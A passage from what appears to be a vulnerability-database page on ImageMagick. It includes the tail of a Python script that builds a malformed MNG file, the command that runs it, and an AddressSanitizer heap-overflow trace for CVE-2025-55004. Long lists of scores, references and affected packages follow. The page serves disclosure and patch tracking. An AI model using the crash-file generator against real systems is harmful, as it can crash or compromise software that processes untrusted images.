  0x0e, 0x12, 0x10, 0x0d, 0x0e, 0x11, 0x0e, 0x0b, 0x0b, 0x10, 0x16, 0x10,
  0x11, 0x13, 0x14, 0x15, 0x15, 0x15, 0x0c, 0x0f, 0x17, 0x18, 0x16, 0x14,
  0x18, 0x12, 0x14, 0x15, 0x14, 0xff, 0xdb, 0x00, 0x43, 0x01, 0x03, 0x04,
  0x04, 0x05, 0x04, 0x05, 0x09, 0x05, 0x05, 0x09, 0x14, 0x0d, 0x0b, 0x0d,
  0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14,
  0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14,
  0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14,
  0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14, 0x14,
  0x14, 0x14, 0xff, 0xc0, 0x00, 0x11, 0x08, 0x00, 0x01, 0x00, 0x80, 0x03,
  0x01, 0x11, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, 0xff, 0xc4, 0x00,
  0x15, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0xff, 0xc4, 0x00, 0x14,
  0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xc4, 0x00, 0x14, 0x01, 0x01,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0xff, 0xc4, 0x00, 0x14, 0x11, 0x01, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0xff, 0xda, 0x00, 0x0c, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03,
  0x11, 0x00, 0x3f, 0x00, 0xaa, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x3f, 0xff, 0xd9
])

# MNG File Construction
mng_sig = b'\x8aMNG\r\n\x1a\n'
mhdr_data = struct.pack('>IIIIIII', 1, 1, 1, 0, 0, 0, 0)
mhdr_chunk = chunk(b'MHDR', mhdr_data)
magn_data = struct.pack('>HH B H H H H H H B', 0, 0, 1, 2, 2, 2, 2, 2, 2, 1)
magn_chunk = chunk(b'MAGN', magn_data)
jhdr_data = struct.pack('>IIBBBBBBBB', 128, 1, 12, 8, 8, 0, 8, 0, 0, 0)
jhdr_chunk = chunk(b'JHDR', jhdr_data)
jdat_chunk = chunk(b'JDAT', jpeg)
scanlines = b'\x00\x00'*128
compressed_scanlines = zlib.compress(scanlines)
idat_chunk = chunk(b'IDAT', compressed_scanlines)
iend_chunk = chunk(b'IEND', b'')
mend_chunk = chunk(b'MEND', b'')
mng_bytes = mng_sig + mhdr_chunk + magn_chunk + jhdr_chunk + jdat_chunk + idat_chunk + iend_chunk + mend_chunk

with open("magn_read.mng", "wb") as tmp:
    tmp.write(mng_bytes)
```

### **Command**

```shell
python3 ./generate_testcase.py
utilities/magick ./magn_read.mng -resize 200x200 PNG:output.png
```

### **ASan Backtrace**

```
=================================================================
==1562409==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x51b000000680 at pc 0x557a486b0c64 bp 0x7ffe63210de0 sp 0x7ffe63210dd8
READ of size 4 at 0x51b000000680 thread T0
    #0 0x557a486b0c63 in GetPixelRed /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:405:10
    #1 0x557a4869ce03 in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6657:51
    #2 0x557a48683c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9
    #3 0x557a487a8f41 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15
    #4 0x557a487abf36 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9
    #5 0x557a48d747a8 in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4961:22
    #6 0x557a48d6862c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5475:7
    #7 0x557a48c3e3fb in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13
    #8 0x557a48c3f7c9 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5
    #9 0x557a48c3c13c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14
    #10 0x557a482847b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10
    #11 0x557a482841e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10
    #12 0x7f1431833ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #13 0x7f1431833d64 in __libc_start_main csu/../csu/libc-start.c:360:3
    #14 0x557a481a0790 in _start (/tmp/repro/imagemagick/utilities/magick+0x1f3790) (BuildId: c19eeda184f03d027903a515c023bed30e652cc3)

0x51b000000680 is located 0 bytes after 1536-byte region [0x51b000000080,0x51b000000680)
allocated by thread T0 here:
    #0 0x557a482405c3 in malloc (/tmp/repro/imagemagick/utilities/magick+0x2935c3) (BuildId: c19eeda184f03d027903a515c023bed30e652cc3)
    #1 0x557a482b9b6a in AcquireMagickMemory /tmp/repro/imagemagick/MagickCore/memory.c:559:10
    #2 0x557a482b9dba in AcquireQuantumMemory /tmp/repro/imagemagick/MagickCore/memory.c:677:10
    #3 0x557a4869c58c in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6584:34
    #4 0x557a48683c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9
    #5 0x557a487a8f41 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15
    #6 0x557a487abf36 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9
    #7 0x557a48d747a8 in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4961:22
    #8 0x557a48d6862c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5475:7
    #9 0x557a48c3e3fb in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13
    #10 0x557a48c3f7c9 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5
    #11 0x557a48c3c13c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14
    #12 0x557a482847b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10
    #13 0x557a482841e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10
    #14 0x7f1431833ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:405:10 in GetPixelRed
Shadow bytes around the buggy address:
  0x51b000000400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51b000000480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51b000000500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51b000000580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51b000000600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x51b000000680:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x51b000000700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x51b000000780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51b000000800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51b000000880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x51b000000900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==1562409==ABORTING
```

## **Reporter Credit**

Google Big Sleep

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55004.json

reference_id

reference_type

scores

value	7.6
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-55004.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2025-55004

reference_id

reference_type

scores

value	0.00044
scoring_system	epss
scoring_elements	0.13395
published_at	2026-04-07T12:55:00Z

value	0.00044
scoring_system	epss
scoring_elements	0.13323
published_at	2026-04-16T12:55:00Z

value	0.00044
scoring_system	epss
scoring_elements	0.13416
published_at	2026-04-13T12:55:00Z

value	0.00044
scoring_system	epss
scoring_elements	0.13537
published_at	2026-04-02T12:55:00Z

value	0.00044
scoring_system	epss
scoring_elements	0.13462
published_at	2026-04-12T12:55:00Z

value	0.00044
scoring_system	epss
scoring_elements	0.13499
published_at	2026-04-11T12:55:00Z

value	0.00044
scoring_system	epss
scoring_elements	0.13598
published_at	2026-04-04T12:55:00Z

value	0.00044
scoring_system	epss
scoring_elements	0.13526
published_at	2026-04-09T12:55:00Z

value	0.00044
scoring_system	epss
scoring_elements	0.13476
published_at	2026-04-08T12:55:00Z

value	0.00048
scoring_system	epss
scoring_elements	0.14692
published_at	2026-04-26T12:55:00Z

value	0.00048
scoring_system	epss
scoring_elements	0.14694
published_at	2026-04-24T12:55:00Z

value	0.00048
scoring_system	epss
scoring_elements	0.14661
published_at	2026-04-21T12:55:00Z

value	0.00048
scoring_system	epss
scoring_elements	0.14601
published_at	2026-04-18T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2025-55004

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	6.6
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/dlemstra/Magick.NET/releases/tag/14.8.0

reference_id

reference_type

scores

value	7.6
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/dlemstra/Magick.NET/releases/tag/14.8.0

reference_url

https://github.com/ImageMagick/ImageMagick

reference_id

reference_type

scores

value	7.6
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-cjc8-g9w8-chfw

reference_id

reference_type

scores

value	7.6
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-13T14:35:55Z/

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-cjc8-g9w8-chfw

reference_url

https://goo.gle/bigsleep

reference_id

reference_type

scores

value	7.6
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-13T14:35:55Z/

url

https://goo.gle/bigsleep

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2025-55004

reference_id

reference_type

scores

value	7.6
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2025-55004

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111101
reference_id	1111101
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111101

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2388246
reference_id	2388246
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2388246

reference_url

https://github.com/advisories/GHSA-cjc8-g9w8-chfw

reference_id

GHSA-cjc8-g9w8-chfw

reference_type

scores

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-cjc8-g9w8-chfw

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u2?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u2%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.1%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.1%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.1%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2025-55004, GHSA-cjc8-g9w8-chfw

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vbdt-31wd-v3h8

url VCID-vguv-n176-k3ch

vulnerability_id VCID-vguv-n176-k3ch

summary ImageMagick: Memory leak in read_user_chunk_callback function

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-11310.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-11310.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2017-11310

reference_id

reference_type

scores

value	0.0039
scoring_system	epss
scoring_elements	0.59945
published_at	2026-04-01T12:55:00Z

value	0.0039
scoring_system	epss
scoring_elements	0.60023
published_at	2026-04-02T12:55:00Z

value	0.0039
scoring_system	epss
scoring_elements	0.60047
published_at	2026-04-04T12:55:00Z

value	0.0039
scoring_system	epss
scoring_elements	0.60017
published_at	2026-04-07T12:55:00Z

value	0.0039
scoring_system	epss
scoring_elements	0.60067
published_at	2026-04-08T12:55:00Z

value	0.0039
scoring_system	epss
scoring_elements	0.60081
published_at	2026-04-09T12:55:00Z

value	0.0039
scoring_system	epss
scoring_elements	0.60102
published_at	2026-04-21T12:55:00Z

value	0.0039
scoring_system	epss
scoring_elements	0.60087
published_at	2026-04-12T12:55:00Z

value	0.0039
scoring_system	epss
scoring_elements	0.6007
published_at	2026-04-13T12:55:00Z

value	0.0039
scoring_system	epss
scoring_elements	0.60109
published_at	2026-04-16T12:55:00Z

value	0.0039
scoring_system	epss
scoring_elements	0.60115
published_at	2026-04-18T12:55:00Z

value	0.0039
scoring_system	epss
scoring_elements	0.60072
published_at	2026-04-24T12:55:00Z

value	0.0039
scoring_system	epss
scoring_elements	0.60088
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2017-11310

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1471096
reference_id	1471096
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1471096

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

